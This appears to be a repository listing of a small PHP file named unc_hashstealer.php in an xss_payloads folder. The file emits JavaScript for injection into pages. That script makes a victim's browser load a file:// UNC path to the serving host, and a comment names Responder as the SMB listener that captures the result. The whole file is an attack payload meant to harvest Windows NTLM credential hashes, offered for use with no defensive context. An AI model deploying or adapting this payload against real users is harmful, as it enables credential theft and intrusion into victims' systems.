xss_payloads/unc_hashstealer.php
2016-08-02 16:53:04 +01:00

8 lines
223 B
PHP
Executable file

<?php
/**
* Inject this in order to have the browser call out to an SMB endpoint, e.g. Responder
*/
$url = "file:///\\".$_SERVER["SERVER_ADDR"];
echo "// $url\n";
?>
new Image().src="<?php echo $url; ?>";